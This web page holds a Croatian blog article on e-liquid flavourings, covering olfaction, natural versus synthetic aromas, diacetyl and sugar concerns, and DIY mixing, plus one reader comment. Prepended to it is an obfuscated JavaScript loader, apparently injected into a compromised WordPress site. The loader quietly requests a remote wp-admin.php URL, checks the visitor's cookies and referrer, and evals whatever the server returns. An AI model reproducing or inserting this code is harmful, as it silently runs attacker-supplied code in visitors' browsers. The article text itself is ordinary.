;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Arome za e-tekućine i kako ih mi kao korisnici doživljavamo

Već smo govorili o sastavu e-tekućine, a sada ćemo pobliže pogledati jedan od njihovih glavnih sastojaka: arome. Mnogo slušamo prehrambenim aromama, ali jesu li sve one prikladne za inhalaciju? Koje kriterije treba uzeti u obzir pri razvoju recepata za e-tekućine?

Kako funkcionira naš osjetilni sustav?

Naš osjetilni sustav sastoji se od pet osjetila: dodir, vid, sluh, okus i miris. Vaping prvenstveno budi posljednje spomenuto osjetilo, miris.

Mirisni sustav je vrlo složen. To je naše najstarije, najmoćnije, a ujedno i najpodsvjesnije osjetilo. Doista, naše olfaktorno pamćenje počinje se graditi čak i prije nego što se rodimo i svakodnevno se poboljšava. Mirisi i okusi utječu na naše raspoloženje i užitak, a da toga nismo svjesni. Neugodan miris može pojačati naš osjećaj nesigurnosti, dok će miris koji budi ugodnu uspomenu iz djetinjstva biti utješan.

Miris je kemijsko osjetilo koje proizvode hlapljive molekule koje su vrlo lagane. Ove molekule mogu proći ortonazalno (izravno kroz nos), izazivajući miris, ili retronazalno (kroz stražnji dio usta), izazivajući okus.

Miris ili okus sastoje se od određenog broja molekula (na primjer, kava se sastoji od preko tisuću aromatskih spojeva). Svi ovi spojevi usmjeravaju se u stražnji dio nosa putem olfaktornog epitela gdje će biti “zarobljeni” olfaktornim cilijama natopljenim nosnom sluzi. Na kraju ovih cilija nalaze se olfaktorni receptori, koji su osjetljivi na određene mirise.

Ukupno imamo oko 400 olfaktornih receptora, sposobnih za detekciju molekula. Mozak, točnije limbički sustav, tada pomaže identificirati miris/okus i reagirati na senzualni učinak. Prije nego što se miris/okus može identificirati, emocionalni sustav preuzima kontrolu (sviđa mi se/ne sviđa mi se). Očito je naš njuh vrlo individualan: svaki će pojedinac, na temelju svog podrijetla, kulture i iskustva, biti manje ili više osjetljiv i privučen određenim mirisom.

Proces koji se odvija u ustima je komplementaran, ali različit. Potrebno je napraviti jasnu razliku između okusa i mirisa. Okus ne pokreću hlapljive molekule, već mnogo teže molekule sapida, koje se ne otkrivaju u nosu, već u okusnim pupoljcima u ustima.

Postoji pet osnovnih okusa: slatko, slano, gorko, kiselo i umami. Usta također sadrže trigeminalne živce, koji detektiraju gazirano, hlađenje ili ljutinu.

E-cigarete su odličan teren za mirise i okuse

Vaping je izvrsno polje za ljubitelje okusa zbog velikog izazova – okus je jedino jamstvo da će korisnik uživati ​​u proizvodu ili ne. Nema mjesta pogrešci jer se okus ne temelji na hrani ili piću koje korisnik već poznaje te očekuje sličan doživljaj. Okus je stoga “goli” i kao takav mora biti karakterističan i uravnotežen da bi se u njemu uživalo.

Međutim, postoji i izazov u smislu potrošača i njihovog uspjeha u prestanku pušenja. Okus bi očito trebao biti ugodan, ali prije svega ne smije biti mučan. Skloni smo pariti više puta dnevno nego što jedemo, na primjer, jogurt ili desert. Ravnoteža i intenzitet okusa ključni su u tome da e-tekućina postane cjelodnevna navika.

Prehrambene arome

Ovaj termin je zapravo suvišan. S regulatornog stajališta, aroma je namijenjena za hranu. To nije slučaj s mirisom (primjerice za parfeme) koji se može sastojati od nejestivih spojeva. Neki proizvođači e-tekućina naglasili su upotrebu aroma “prikladnih za hranu” kako bi uvjerili potrošača da ne koriste spojeve namijenjene industriji mirisa.

Okusi u e-tekućinama imaju dva specifična svojstva: zagrijavaju se i udišu. A kako se okusi udišu, posebno se pazi na spojeve koji mogu predstavljati probleme. Mnogo se govorilo o diacetilu; stoga savjetujemo oprez i poštivanje AFNOR standarda XP D90-300-2 koji zabranjuje dobrovoljno dodavanje diacetila u e-tekućinu.

Sintetičke arome i prirodne arome

Jedno nije poželjnije od drugog, sve ovisi o osobnim izborima i uvjerenjima. Postoje 3 vrste sirovina koje mogu činiti aromatični dio okusa:

  • Aromatični pripravci: to su ekstrakti dobiveni izravno iz prirodnih izvora, kao što su eterična ulja, uljane smole, infuzije, destilati, itd. Ove sirovine su prirodne.
  • Prirodne aromatične tvari: to su spojevi dobiveni iz prirodnog proizvoda. Proces ekstrakcije, pročišćavanja i koncentriranja odvija se prije nego što se dobije željena molekula. Ove sirovine su prirodne.
  • Aromatične tvari: to su spojevi dobiveni kemijskom sintezom. Ovi spojevi uključuju spojeve identične onima koji se nalaze u prirodnim izvorima, ali i 100% umjetne spojeve koji ne postoje u prirodnom stanju u našem okolišu.

Evo primjera: Prirodni maltol = sintetički maltol (identičan prirodnom) ≠ etil maltol (umjetni)

Tehnički list, MSDS, certifikat o kompatibilnosti s hranom i potvrda o prirodnom podrijetlu moraju se dobiti od dobavljača gdje je primjenjivo. Nažalost, Uredba EZ 1334/ 2008. ne dopušta razliku između uporabe aromatičnih tvari „identičnih prirodi“ i uporabe „umjetnih“ aromatičnih tvari. Jedini način da budete sigurni da umjetne sirovine ne koristite je korištenje e-tekućina koje su formulirane isključivo s prirodnim okusima.

Glavni razlog što proizvođače natjera da se odluče za umjetne aromatične tvari je ekonomičnost. Prirodna aroma vanilije, na primjer, može biti i do 400 puta skuplja od umjetne arome vanilije.

Koje mjere opreza proizvođač mora poduzeti pri kupnji koncentrata okusa?

Posebno treba biti oprezan s e-tekućinama koje sadrže šećer. Nakon zagrijavanja, šećer se pretvara u karamel i može proizvesti otrovne pare.

Prvo, potrebno je osigurati da okus bude aroma s regulatorne točke gledišta, te da se kao takav sastoji samo od aromatičnih spojeva. Tehnički list s podacima, MSDS, potvrda o kompatibilnosti s hranom i potvrda o prirodnom podrijetlu moraju se dobiti od dobavljača gdje je primjenjivo.

U okviru TPD-a, proizvođač e-tekućina odgovoran je za marketing ne samo gotovog proizvoda, već i njegovih komponenti, uključujući okus.

Dodavanje šećera

Kao što je gore spomenuto, šećer se osjeća okusnim pupoljcima, a ne olfaktornim epitelom. Stoga, okus nije sladak sam po sebi, već samo sugerira dašak slatkoće. Okus “Tiramisu” ili “Cookie” nije sladak, ali ga mozak tumači kao takav. Stoga nema razloga biti oprezan s takvim okusima.

S druge strane, posebno treba biti oprezan s e-tekućinama koje sadrže šećer. Nakon zagrijavanja, šećer se pretvara u karamel i može proizvesti otrovne pare. Šećer nije napravljen za udisanje. AFNOR standard XP D90-300-2 poglavlje 4.2.7.4 je vrlo jasan u tom pogledu: šećeri se ne mogu koristiti kao sastojci u sastavu e-tekućine.

DIY e-tekućine

Sektor DIY ne bi trebao biti zabranjen, kao što bi neki željeli, ali treba ga dobro voditi.

Zabrana često čini nešto privlačnijim i potiče odstupanja od pravila. Odstupanja mogu stvoriti probleme, kao i uvođenje masti, šećera, alkohola itd.

Korisnici trebaju smjernice. Priprema tekućine sličnija je kemiji nego kuhanju. Na internetu se pojavljuju neki čudni savjeti među privatnim korisnicima, kao što je dodavanje šećera ili votke u pripravke, mjerenje okusa na 40% kada proizvođač preporučuje 10%… Korisnici moraju biti dobro informirani i slijediti savjete proizvođača.

Choose your Reaction!
  • Cisto kao tangenta na clanak, jako je interesantno pogledati koje su tekucine najvise “voljene” u odredjenim zemljama bazirano na prehrani. Slicno se komapracija, ako se dobro sjecam, radila u duhanskoj industriji. Ovo je moj neki osobni uvid baziran na poznavanju ljudi i ne temelji se na nikakvim podatcima, ali, primjecujem da u Hr se vise preferira duhan, orasasti plodovi a manje slatke tekucine. U Irskoj i U.S. su pretezno dominantne slatke do jako slatke tekucine, sto bi odgovaralo nekom generalnom vidjenju navike slatko-ili-slano za dorucak/rucak.

Leave a Comment